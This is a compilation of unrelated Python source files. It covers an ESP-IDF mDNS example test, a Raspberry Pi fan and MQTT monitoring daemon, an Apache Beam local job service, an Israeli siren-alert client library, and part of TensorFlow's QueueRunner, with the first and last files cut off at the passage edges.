sources = [Source.factory(s, u) for (s, u) in json.load(f).items()]
table = OrderedTable()
while table.alive():
all_sources = []
for s in sources:
all_sources.extend(s.list())
shuffle(all_sources)
for s in all_sources:
table.add(s)
# TODO: parametize sleep time
logger.debug('Current number of items #{}'.format(table.size()))
start = time.time()
while time.time() - start < CURATE_RELOAD_TIME and table.alive():
time.sleep(1)
class LMC(with_metaclass(Singleton, object)):
def __init__(self):
self.table = OrderedTable()
threading.Thread(target=curate).start()
def __iter__(self):
return self
def pop(self,
wait_rampup=True,
raise_exception=False):
while True:
try:
yield self.table.first()
except:
if raise_exception: raise
if wait_rampup: continue
yield None
def stop(self):
self.table.stop()
|
mdns_example_test.py
|
import re
import os
import sys
import socket
import time
import struct
import dpkt
import dpkt.dns
from threading import Thread, Event
# this is a test case write with tiny-test-fw.
# to run test cases outside tiny-test-fw,
# we need to set environment variable `TEST_FW_PATH`,
# then get and insert `TEST_FW_PATH` to sys path before import FW module
try:
import IDF
except ImportError:
test_fw_path = os.getenv("TEST_FW_PATH")
if test_fw_path and test_fw_path not in sys.path:
sys.path.insert(0, test_fw_path)
import IDF
import DUT
# g_run_server = True
# g_done = False
stop_mdns_server = Event()
esp_answered = Event()
def get_dns_query_for_esp(esp_host):
dns = dpkt.dns.DNS(b'\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01')
dns.qd[0].name = esp_host + u'.local'
print("Created query for esp host: {} ".format(dns.__repr__()))
return dns.pack()
def get_dns_answer_to_mdns(tester_host):
dns = dpkt.dns.DNS(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
dns.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_A
arr.name = tester_host
arr.ip = socket.inet_aton('127.0.0.1')
dns. an.append(arr)
print("Created answer to mdns query: {} ".format(dns.__repr__()))
return dns.pack()
def get_dns_answer_to_mdns_lwip(tester_host, id):
dns = dpkt.dns.DNS(b"\x5e\x39\x84\x00\x00\x01\x00\x01\x00\x00\x00\x00\x0a\x64\x61\x76\x69\x64"
b"\x2d\x63\x6f\x6d\x70\x05\x6c\x6f\x63\x61\x6c\x00\x00\x01\x00\x01\xc0\x0c"
b"\x00\x01\x00\x01\x00\x00\x00\x0a\x00\x04\xc0\xa8\x0a\x6c")
dns.qd[0].name = tester_host
dns.an[0].name = tester_host
dns.an[0].ip = socket.inet_aton('127.0.0.1')
dns.an[0].rdata = socket.inet_aton('127.0.0.1')
dns.id = id
print("Created answer to mdns (lwip) query: {} ".format(dns.__repr__()))
return dns.pack()
def mdns_server(esp_host):
global esp_answered
UDP_IP = "0.0.0.0"
UDP_PORT = 5353
MCAST_GRP = '224.0.0.251'
TESTER_NAME = u'tinytester.local'
TESTER_NAME_LWIP = u'tinytester-lwip.local'
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sock.bind((UDP_IP,UDP_PORT))
mreq = struct.pack("4sl", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
sock.settimeout(30)
while not stop_mdns_server.is_set():
try:
if not esp_answered.is_set():
sock.sendto(get_dns_query_for_esp(esp_host), (MCAST_GRP,UDP_PORT))
time.sleep(0.2)
data, addr = sock.recvfrom(1024)
dns = dpkt.dns.DNS(data)
if len(dns.qd) > 0 and dns.qd[0].type == dpkt.dns.DNS_A:
if dns.qd[0].name == TESTER_NAME:
print("Received query: {} ".format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns(TESTER_NAME), (MCAST_GRP,UDP_PORT))
elif dns.qd[0].name == TESTER_NAME_LWIP:
print("Received query: {} ".format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns_lwip(TESTER_NAME_LWIP, dns.id), addr)
if len(dns.an) > 0 and dns.an[0].type == dpkt.dns.DNS_A:
if dns.an[0].name == esp_host + u'.local':
print("Received answer to esp32-mdns query: {}".format(dns.__repr__()))
esp_answered.set()
except socket.timeout:
break
except dpkt.UnpackError:
continue
@IDF.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mdns(env, extra_data):
global stop_mdns_server
"""
steps: |
1. join AP + init mdns example
2. get the dut host name (and IP address)
3. check the mdns name is accessible
4. check DUT output if mdns advertized host is resolved
"""
dut1 = env.get_dut("mdns-test", "examples/protocols/mdns")
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mdns-test.bin")
bin_size = os.path.getsize(binary_file)
IDF.log_performance("mdns-test_bin_size", "{}KB".format(bin_size // 1024))
IDF.check_performance("mdns-test_bin_size", bin_size // 1024)
# 1. start mdns application
dut1.start_app()
# 2. get the dut host name (and IP address)
specific_host = dut1.expect(re.compile(r"mdns hostname set to: \[([^\]]+)\]"), timeout=30)
specific_host = str(specific_host[0])
thread1 = Thread(target=mdns_server, args=(specific_host,))
thread1.start()
try:
dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
except DUT.ExpectTimeout:
stop_mdns_server.set()
thread1.join()
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
# 3. check the mdns name is accessible
if not esp_answered.wait(timeout=30):
raise ValueError('Test has failed: did not receive mdns answer within timeout')
# 4. check DUT output if mdns advertized host is resolved
try:
dut1.expect(re.compile(r"mdns-test: Query A: tinytester.local resolved to: 127.0.0.1"), timeout=30)
dut1.expect(re.compile(r"mdns-test: gethostbyname: tinytester-lwip.local resolved to: 127.0.0.1"), timeout=30)
dut1.expect(re.compile(r"mdns-test: getaddrinfo: tinytester-lwip.local resolved to: 127.0.0.1"), timeout=30)
finally:
stop_mdns_server.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mdns()
|
argononed.py
|
#!/usr/bin/python3
import smbus
import RPi.GPIO as GPIO
import os
import sys
import time
import psutil
import json
import subprocess
from threading import Thread
import paho.mqtt.client as mqtt
import yaml
rev = GPIO.RPI_REVISION
if rev == 2 or rev == 3:
bus = smbus.SMBus(1)
else:
bus = smbus.SMBus(0)
MQTT_CLIENT = os.uname()[1] + "_stats"
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
shutdown_pin=4
GPIO.setup(shutdown_pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
class Config:
def __init__(self, configfile):
defaultfan = [{65: 100}, {60: 55}, {55: 10}]
with open(configfile) as file:
self._config = yaml.load(file, Loader=yaml.FullLoader)
mqtt = self._config.get('mqtt', {})
self._server = mqtt.get('server', 'localhost')
self._port = mqtt.get('port', 1883)
self._topic = mqtt.get('topic', 'homeassistant/status/%%hostname%%')
self._topic = self._topic.replace('%%hostname%%', os.uname()[1].lower())
self._temps = self._config.get('fan', defaultfan)
try:
self._temps.sort(reverse=True, key=lambda x: (list(x.keys()))[0])
for s in self._temps:
int(s[list(s.keys())[0]])
except:
print(f'Fan values are invalid: {sys.exc_info()[1]} - using deaults')
self._temps = defaultfan
self._temps.sort(reverse=True, key=lambda x: (list(x.keys()))[0])
self._lowtemp = list(self._temps[len(self._temps) - 1].keys())[0]
def get_topic(self):
return self._topic
def get_port(self):
return self._port
def get_server(self):
return self._server
def get_speed(self, temp):
if temp < self._lowtemp:
return 0
for s in self._temps:
if temp >= list(s.keys())[0]:
return s[list(s.keys())[0]]
return 0
def shutdown_check():
while True:
pulsetime = 1
GPIO.wait_for_edge(shutdown_pin, GPIO.RISING)
time.sleep(0.01)
while GPIO.input(shutdown_pin) == GPIO.HIGH:
time.sleep(0.01)
pulsetime += 1
if pulsetime >=2 and pulsetime <=3:
os.system("reboot")
elif pulsetime >=4 and pulsetime <=5:
os.system("shutdown now -h")
def get_readings():
readings = {
"gputemp": 0,
"cputemp": 0,
"useddisk": 0,
"usedmem": 0,
"cpuperc": 0
}
response = subprocess.run(['/opt/vc/bin/vcgencmd', 'measure_temp'], stdout=subprocess.PIPE)
if response.returncode != 0:
readings["gputemp"] = 0
else:
readings["gputemp"] = float(str(response.stdout, 'utf-8')[5 : -3])
readings["useddisk"] = psutil.disk_usage('/').percent
readings["usedmem"] = psutil.virtual_memory().percent
readings["cpuperc"] = psutil.cpu_percent()
return readings
def temp_check():
fanconfig = Config("/etc/argond_config.yaml")
client = mqtt.Client(MQTT_CLIENT)
client.loop_start()
try:
client.connect(fanconfig.get_server(), fanconfig.get_port())
except:
print(f'Failed to connect to MQTT server: {sys.exc_info()[1]}')
readings = {}
address=0x1a
prevblock=0
while True:
readings = get_readings()
try:
tempfp = open("/sys/class/thermal/thermal_zone0/temp", "r")
temp = tempfp.readline()
tempfp.close()
val = float(int(temp)/1000)
except IOError:
val = 0
readings["cputemp"] = val
block = fanconfig.get_speed(val)
if block < prevblock:
time.sleep(30)
prevblock = block
try:
bus.write_byte(address, block)
except IOError:
temp=""
readings["fanspeed"] = block
if client.is_connected():
client.publish(fanconfig.get_topic(), json.dumps(readings))
time.sleep(30)
t1 = 0
t2 = 0
try:
t1 = Thread(target = shutdown_check)
t2 = Thread(target = temp_check)
t1.start()
t2.start()
except:
t1.stop()
t2.stop()
GPIO.cleanup()
|
local_job_service.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from __future__ import absolute_import
import concurrent.futures
import logging
import os
import queue
import shutil
import subprocess
import tempfile
import threading
import time
import traceback
from builtins import object
from typing import TYPE_CHECKING
from typing import List
from typing import Optional
import grpc
from google.protobuf import text_format # type: ignore # not in typeshed
from apache_beam.metrics import monitoring_infos
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.portability import abstract_job_service
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability.fn_api_runner import fn_runner
from apache_beam.runners.portability.fn_api_runner import worker_handlers
from apache_beam.utils import thread_pool_executor
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.portability.api import beam_runner_api_pb2
_LOGGER = logging.getLogger(__name__)
def _iter_queue(q):
while True:
yield q.get(block=True)
class LocalJobServicer(abstract_job_service.AbstractJobServiceServicer):
"""Manages one or more pipelines, possibly concurrently.
Experimental: No backward compatibility guaranteed.
Servicer for the Beam Job API.
This JobService uses a basic local implementation of runner to run the job.
This JobService is not capable of managing job on remote clusters.
By default, this JobService executes the job in process but still uses GRPC
to communicate pipeline and worker state. It can also be configured to use
inline calls rather than GRPC (for speed) or launch completely separate
subprocesses for the runner and worker(s).
"""
def __init__(self, staging_dir=None):
super(LocalJobServicer, self).__init__()
self._cleanup_staging_dir = staging_dir is None
self._staging_dir = staging_dir or tempfile.mkdtemp()
self._legacy_artifact_service = (
artifact_service.BeamFilesystemArtifactService(self._staging_dir))
self._artifact_service = artifact_service.ArtifactStagingService(
artifact_service.BeamFilesystemHandler(self._staging_dir).file_writer)
self._artifact_staging_endpoint = None # type: Optional[endpoints_pb2.ApiServiceDescriptor]
def create_beam_job(self,
preparation_id, # stype: str
job_name, # type: str
pipeline, # type: beam_runner_api_pb2.Pipeline
options # type: struct_pb2.Struct
):
# type: (...) -> BeamJob
# TODO(angoenka): Pass an appropriate staging_session_token. The token can
# be obtained in PutArtifactResponse from JobService
if not self._artifact_staging_endpoint:
# The front-end didn't try to stage anything, but the worker may
# request what's here so we should at least store an empty manifest.
self._legacy_artifact_service.CommitManifest(
beam_artifact_api_pb2.CommitManifestRequest(
staging_session_token=preparation_id,
manifest=beam_artifact_api_pb2.Manifest()))
self._artifact_service.register_job(
staging_token=preparation_id,
dependency_sets={
id: env.dependencies
for (id, env) in pipeline.components.environments.items()
})
provision_info = fn_runner.ExtendedProvisionInfo(
beam_provision_api_pb2.ProvisionInfo(
pipeline_options=options,
retrieval_token=self._legacy_artifact_service.retrieval_token(
preparation_id)),
self._staging_dir,
job_name=job_name)
return BeamJob(
preparation_id,
pipeline,
options,
provision_info,
self._artifact_staging_endpoint,
self._artifact_service)
def get_bind_address(self):
"""Return the address used to open the port on the gRPC server.
This is often, but not always the same as the service address. For
example, to make the service accessible to external machines, override this
to return '[::]' and override `get_service_address()` to return a publicly
accessible host name.
"""
return self.get_service_address()
def get_service_address(self):
"""Return the host name at which this server will be accessible.
In particular, this is provided to the client upon connection as the
artifact staging endpoint.
"""
return 'localhost'
def start_grpc_server(self, port=0):
self._server = grpc.server(thread_pool_executor.shared_unbounded_instance())
port = self._server.add_insecure_port(
'%s:%d' % (self.get_bind_address(), port))
beam_job_api_pb2_grpc.add_JobServiceServicer_to_server(self, self._server)
beam_artifact_api_pb2_grpc.add_LegacyArtifactStagingServiceServicer_to_server(
self._legacy_artifact_service, self._server)
beam_artifact_api_pb2_grpc.add_ArtifactStagingServiceServicer_to_server(
self._artifact_service, self._server)
hostname = self.get_service_address()
self._artifact_staging_endpoint = endpoints_pb2.ApiServiceDescriptor(
url='%s:%d' % (hostname, port))
self._server.start()
_LOGGER.info('Grpc server started at %s on port %d' % (hostname, port))
return port
def stop(self, timeout=1):
self._server.stop(timeout)
if os.path.exists(self._staging_dir) and self._cleanup_staging_dir:
shutil.rmtree(self._staging_dir, ignore_errors=True)
def GetJobMetrics(self, request, context=None):
if request.job_id not in self._jobs:
raise LookupError("Job {} does not exist".format(request.job_id))
result = self._jobs[request.job_id].result
monitoring_info_list = []
for mi in result._monitoring_infos_by_stage.values():
monitoring_info_list.extend(mi)
# Filter out system metrics
user_monitoring_info_list = [
x for x in monitoring_info_list
if monitoring_infos.is_user_monitoring_info(x)
]
return beam_job_api_pb2.GetJobMetricsResponse(
metrics=beam_job_api_pb2.MetricResults(
committed=user_monitoring_info_list))
class SubprocessSdkWorker(object):
"""Manages a SDK worker implemented as a subprocess communicating over grpc.
"""
def __init__(
self,
worker_command_line, # type: bytes
control_address,
worker_id=None):
self._worker_command_line = worker_command_line
self._control_address = control_address
self._worker_id = worker_id
def run(self):
logging_server = grpc.server(
thread_pool_executor.shared_unbounded_instance())
logging_port = logging_server.add_insecure_port('[::]:0')
logging_server.start()
logging_servicer = BeamFnLoggingServicer()
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
logging_servicer, logging_server)
logging_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url='localhost:%s' % logging_port))
control_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url=self._control_address))
env_dict = dict(
os.environ,
CONTROL_API_SERVICE_DESCRIPTOR=control_descriptor,
LOGGING_API_SERVICE_DESCRIPTOR=logging_descriptor)
# only add worker_id when it is set.
if self._worker_id:
env_dict['WORKER_ID'] = self._worker_id
with worker_handlers.SUBPROCESS_LOCK:
p = subprocess.Popen(self._worker_command_line, shell=True, env=env_dict)
try:
p.wait()
if p.returncode:
raise RuntimeError(
'Worker subprocess exited with return code %s' % p.returncode)
finally:
if p.poll() is None:
p.kill()
logging_server.stop(0)
class BeamJob(abstract_job_service.AbstractBeamJob):
"""This class handles running and managing a single pipeline.
The current state of the pipeline is available as self.state.
"""
def __init__(self,
job_id, # type: str
pipeline,
options,
provision_info, # type: fn_runner.ExtendedProvisionInfo
artifact_staging_endpoint, # type: Optional[endpoints_pb2.ApiServiceDescriptor]
artifact_service, # type: artifact_service.ArtifactStagingService
):
super(BeamJob,
self).__init__(job_id, provision_info.job_name, pipeline, options)
self._provision_info = provision_info
self._artifact_staging_endpoint = artifact_staging_endpoint
self._artifact_service = artifact_service
self._state_queues = [] # type: List[queue.Queue]
self._log_queues = [] # type: List[queue.Queue]
self.daemon = True
self.result = None
def set_state(self, new_state):
"""Set the latest state as an int enum and notify consumers"""
timestamp = super(BeamJob, self).set_state(new_state)
if timestamp is not None:
# Inform consumers of the new state.
for queue in self._state_queues:
queue.put((new_state, timestamp))
def prepare(self):
pass
def artifact_staging_endpoint(self):
return self._artifact_staging_endpoint
def run(self):
self.set_state(beam_job_api_pb2.JobState.STARTING)
self._run_thread = threading.Thread(target=self._run_job)
self._run_thread.start()
def _run_job(self):
self.set_state(beam_job_api_pb2.JobState.RUNNING)
with JobLogHandler(self._log_queues):
self._update_dependencies()
try:
result = fn_runner.FnApiRunner(
provision_info=self._provision_info).run_via_runner_api(
self._pipeline_proto)
_LOGGER.info('Successfully completed job.')
self.set_state(beam_job_api_pb2.JobState.DONE)
self.result = result
except: # pylint: disable=bare-except
_LOGGER.exception('Error running pipeline.')
_LOGGER.exception(traceback)
self.set_state(beam_job_api_pb2.JobState.FAILED)
raise
def _update_dependencies(self):
try:
for env_id, deps in self._artifact_service.resolved_deps(
self._job_id, timeout=0).items():
# Slice assignment not supported for repeated fields.
env = self._pipeline_proto.components.environments[env_id]
del env.dependencies[:]
env.dependencies.extend(deps)
self._provision_info.provision_info.ClearField('retrieval_token')
except concurrent.futures.TimeoutError:
pass # TODO(BEAM-9577): Require this once all SDKs support it.
def cancel(self):
if not self.is_terminal_state(self.state):
self.set_state(beam_job_api_pb2.JobState.CANCELLING)
# TODO(robertwb): Actually cancel...
self.set_state(beam_job_api_pb2.JobState.CANCELLED)
def get_state_stream(self):
# Register for any new state changes.
state_queue = queue.Queue()
self._state_queues.append(state_queue)
for state, timestamp in self.with_state_history(_iter_queue(state_queue)):
yield state, timestamp
if self.is_terminal_state(state):
break
def get_message_stream(self):
# Register for any new messages.
log_queue = queue.Queue()
self._log_queues.append(log_queue)
self._state_queues.append(log_queue)
for msg in self.with_state_history(_iter_queue(log_queue)):
if isinstance(msg, tuple):
assert len(msg) == 2 and isinstance(msg[0], int)
current_state = msg[0]
yield msg
if self.is_terminal_state(current_state):
break
else:
yield msg
class BeamFnLoggingServicer(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
def Logging(self, log_bundles, context=None):
for log_bundle in log_bundles:
for log_entry in log_bundle.log_entries:
_LOGGER.info('Worker: %s', str(log_entry).replace('\n', ' '))
return iter([])
class JobLogHandler(logging.Handler):
"""Captures logs to be returned via the Beam Job API.
Enabled via the with statement."""
# Mapping from logging levels to LogEntry levels.
LOG_LEVEL_MAP = {
logging.FATAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.CRITICAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.ERROR: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.WARNING: beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING,
logging.INFO: beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC,
logging.DEBUG: beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG,
}
def __init__(self, log_queues):
super(JobLogHandler, self).__init__()
self._last_id = 0
self._logged_thread = None
self._log_queues = log_queues
def __enter__(self):
# Remember the current thread to demultiplex the logs of concurrently
# running pipelines (as Python log handlers are global).
self._logged_thread = threading.current_thread()
logging.getLogger().addHandler(self)
def __exit__(self, *args):
self._logged_thread = None
self.close()
def _next_id(self):
self._last_id += 1
return str(self._last_id)
def emit(self, record):
if self._logged_thread is threading.current_thread():
msg = beam_job_api_pb2.JobMessage(
message_id=self._next_id(),
time=time.strftime(
'%Y-%m-%d %H:%M:%S.', time.localtime(record.created)),
importance=self.LOG_LEVEL_MAP[record.levelno],
message_text=self.format(record))
# Inform all message consumers.
for queue in self._log_queues:
queue.put(msg)
|
client.py
|
from __future__ import annotations
import asyncio
import time
from datetime import datetime
from io import BytesIO
from threading import Thread
from typing import Union, List, TYPE_CHECKING
from .abc import Client
from .enums import HistoryMode
from .http import SyncHTTPClient, AsyncHTTPClient
from .siren import Siren
if TYPE_CHECKING:
from .city import City
from .range import Range
__all__ = ("SyncClient", "AsyncClient")
class SyncClient(Client):
"""
Represents a sync pikudhaoref client.
"""
__slots__ = ()
def __init__(self, update_interval: Union[int, float] = 2, proxy: str = None):
"""
:param Union[int, float] update_interval: The update interval of the client.
"""
super().__init__()
self.update_interval = update_interval
self.http = SyncHTTPClient(proxy=proxy)
self._initialized = False
self.closed = False
self._known_sirens = []
self.city_cache = []
self.initialize()
Thread(target=self._handle_sirens, daemon=True).start()
def initialize(self):
if not self._initialized:
for city in self.http.city_data:
self.city_cache.append(self.get_city(city["he"]))
self._initialized = True
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
self.closed = True
self.http.session.close()
def get_history(
self,
mode: HistoryMode = HistoryMode.TODAY,
date_range: Range = None,
get_city: bool = False,
) -> List[Siren]:
if date_range:
sirens = self.http.get_range_history(date_range.start, date_range.end)
else:
sirens = self.http.get_history(mode.value)
if get_city:
for siren in sirens:
siren["data"] = self.get_city(siren["data"])
return [Siren.from_raw(x) for x in sirens]
def create_map(self, cities: List[City], key: str = None) -> BytesIO:
return self.http.create_map(cities, key)
@property
def current_sirens(self) -> List[Siren]:
return [
Siren(self.get_city(x), datetime.utcnow())
for x in self.remove_duplicates(self.http.get_current_sirens())
]
def _handle_sirens(self):
self.initialize()
while not self.closed:
time.sleep(self.update_interval)
sirens = self.current_sirens
new_sirens = [
siren
for siren in sirens
if siren.city not in [siren.city for siren in self._known_sirens]
]
if new_sirens:
self._known_sirens.extend(new_sirens)
self.call_sync_event("on_siren", new_sirens)
if not sirens:
ended_sirens = [
x
for x in self._known_sirens
if x.city not in [siren.city for siren in sirens]
]
if ended_sirens:
self.call_sync_event("on_siren_end", ended_sirens)
self._known_sirens = []
class AsyncClient(Client):
"""
Represents an async pikudhaoref client.
"""
__slots__ = ("loop",)
def __init__(
self,
update_interval: Union[int, float] = 2,
loop: asyncio.AbstractEventLoop = None,
proxy: str = None,
):
"""
:param Union[int, float] update_interval: The update interval of the client.
"""
super().__init__()
self.loop = loop or asyncio.get_event_loop()
self.update_interval = update_interval
self.http = AsyncHTTPClient(loop=loop, proxy=proxy)
self._initialized = False
self.closed = False
self.city_cache = []
self._known_sirens = []
loop.create_task(self._handle_sirens())
async def initialize(self):
if not self._initialized:
await self.http.initialize_city_data()
for city in self.http.city_data:
self.city_cache.append(self.get_city(city["he"]))
self._initialized = False
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_value, exc_traceback):
self.closed = True
await self.http.session.close()
async def get_history(
self,
mode: HistoryMode = HistoryMode.TODAY,
range_: Range = None,
get_city: bool = False,
) -> List[Siren]:
if range_:
sirens = await self.http.get_range_history(range_.start, range_.end)
else:
sirens = await self.http.get_history(mode.value)
if get_city:
for siren in sirens:
siren["data"] = self.get_city(siren["data"])
return [Siren.from_raw(x) for x in sirens]
async def current_sirens(self) -> List[Siren]:
return [
Siren(self.get_city(x), datetime.utcnow())
for x in self.remove_duplicates(await self.http.get_current_sirens())
]
async def create_map(self, cities: List[City], key: str = None) -> BytesIO:
return await self.http.create_map(cities, key)
async def _handle_sirens(self):
await self.initialize()
while not self.closed:
await asyncio.sleep(self.update_interval)
sirens = await self.current_sirens()
new_sirens = [
siren
for siren in sirens
if siren.city not in [siren.city for siren in self._known_sirens]
]
if new_sirens:
self._known_sirens.extend(new_sirens)
await self.call_async_event("on_siren", new_sirens)
if not sirens:
ended_sirens = [
x
for x in self._known_sirens
if x.city not in [siren.city for siren in sirens]
]
if ended_sirens:
await self.call_async_event("on_siren_end", ended_sirens)
self._known_sirens = []
|
queue_runner.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Create threads to run multiple enqueue ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorflow.core.protobuf import queue_runner_pb2
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.platform import tf_logging as logging
class QueueRunner(object):
"""Holds a list of enqueue operations for a queue, each to be run in a thread.
Queues are a convenient TensorFlow mechanism to compute tensors
asynchronously using multiple threads. For example in the canonical 'Input
Reader' setup one set of threads generates filenames in a queue; a second set
of threads read records from the files, processes them, and enqueues tensors
on a second queue; a third set of threads dequeues these input records to
construct batches and runs them through training operations.
There are several delicate issues when running multiple threads that way:
closing the queues in sequence as the input is exhausted, correctly catching
and reporting exceptions, etc.
The `QueueRunner`, combined with the `Coordinator`, helps handle these issues.
"""
def __init__(self, queue=None, enqueue_ops=None, close_op=None,
cancel_op=None, queue_closed_exception_types=None,
queue_runner_def=None, import_scope=None):
"""Create a QueueRunner.
On construction the `QueueRunner` adds an op to close the queue. That op
will be run if the enqueue ops raise exceptions.
When you later call the `create_threads()` method, the `QueueRunner` will
create one thread for each op in `enqueue_ops`. Each thread will run its
enqueue op in parallel with the other threads. The enqueue ops do not have
to all be the same op, but it is expected that they all enqueue tensors in
`queue`.
Args:
queue: A `Queue`.
enqueue_ops: List of enqueue ops to run in threads later.
close_op: Op to close the queue. Pending enqueue ops are preserved.
cancel_op: Op to close the queue and cancel pending enqueue ops.
queue_closed_exception_types: Optional tuple of Exception types that
indicate that the queue has been closed when raised during an enqueue
operation. Defaults to `(tf.errors.OutOfRangeError,)`. Another common
case includes `(tf.errors.OutOfRangeError, tf.errors.CancelledError)`,
when some of the enqueue ops may dequeue from other Queues.
queue_runner_def: Optional `QueueRunnerDef` protocol buffer. If specified,
recreates the QueueRunner from its contents. `queue_runner_def` and the
other arguments are mutually exclusive.
import_scope: Optional `string`. Name scope to add. Only used when
initializing from protocol buffer.
Raises:
ValueError: If both `queue_runner_def` and `queue` are both specified.
ValueError: If `queue` or `enqueue_ops` are not provided when not
restoring from `queue_runner_def`.
"""
if queue_runner_def:
if queue or enqueue_ops:
raise ValueError("queue_runner_def and queue are mutually exclusive.")
self._init_from_proto(queue_runner_def,
import_scope=import_scope)
else:
self._init_from_args(
queue=queue, enqueue_ops=enqueue_ops,
close_op=close_op, cancel_op=cancel_op,
queue_closed_exception_types=queue_closed_exception_types)
# Protect the count of runs to wait for.
self._lock = threading.Lock()
self._runs = 0
# List of exceptions raised by the running threads.
self._exceptions_raised = []
def _init_from_args(self, queue=None, enqueue_ops=None, close_op=None,
cancel_op=None, queue_closed_exception_types=None):
"""Create a QueueRunner from arguments.
Args:
queue: A `Queue`.
enqueue_ops: List of enqueue ops to run in threads later.
close_op: Op to close the queue. Pending enqueue ops are preserved.
cancel_op: Op to close the queue and cancel pending enqueue ops.
queue_closed_exception_types: Tuple of exception types, which indicate
the queue has been safely closed.
Raises:
ValueError: If `queue` or `enqueue_ops` are not provided when not
restoring from `queue_runner_def`.
TypeError: If `queue_closed_exception_types` is provided, but is not
a non-empty tuple of error types (subclasses of `tf.errors.OpError`).
"""
if not queue or not enqueue_ops:
raise ValueError("Must provide queue and enqueue_ops.")
self._queue = queue
self._enqueue_ops = enqueue_ops
self._close_op = close_op
self._cancel_op = cancel_op
if queue_closed_exception_types is not None:
if (not isinstance(queue_closed_exception_types, tuple)
or not queue_closed_exception_types
or not all(issubclass(t, errors.OpError)
for t in queue_closed_exception_types)):
raise TypeError(
"queue_closed_exception_types, when provided, "
"must be a non-empty list of tf.error types, but saw: %s"
% queue_closed_exception_types)
self._queue_closed_exception_types = queue_closed_exception_types
# Close when no more will be produced, but pending enqueues should be
# preserved.
if self._close_op is None:
self._close_op = self._queue.close()
# Close and cancel pending enqueues since there was an error and we want
# to unblock everything so we can cleanly exit.
if self._cancel_op is None:
self._cancel_op = self._queue.close(cancel_pending_enqueues=True)
if not self._queue_closed_exception_types:
self._queue_closed_exception_types = (errors.OutOfRangeError,)
else:
self._queue_closed_exception_types = tuple(
self._queue_closed_exception_types)
def _init_from_proto(self, queue_runner_def, import_scope=None):
"""Create a QueueRunner from `QueueRunnerDef`.
Args:
queue_runner_def: Optional `QueueRunnerDef` protocol buffer.
import_scope: Optional `string`. Name scope to add.
"""
assert isinstance(queue_runner_def, queue_runner_pb2.QueueRunnerDef)
g = ops.get_default_graph()
self._queue = g.as_graph_element(
ops.prepend_name_scope(queue_runner_def.queue_name, import_scope))
self._enqueue_ops = [g.as_graph_element(
ops.prepend_name_scope(op, import_scope))
for op in queue_runner_def.enqueue_op_name]
self._close_op = g.as_graph_element(ops.prepend_name_scope(
queue_runner_def.close_op_name, import_scope))
self._cancel_op = g.as_graph_element(ops.prepend_name_scope(
queue_runner_def.cancel_op_name, import_scope))
self._queue_closed_exception_types = tuple(
errors.exception_type_from_error_code(code)
for code in queue_runner_def.queue_closed_exception_types)
# Legacy support for old QueueRunnerDefs created before this field
# was added.
if not self._queue_closed_exception_types:
self._queue_closed_exception_types = (errors.OutOfRangeError,)
@property
def queue(self):
return self._queue
@property
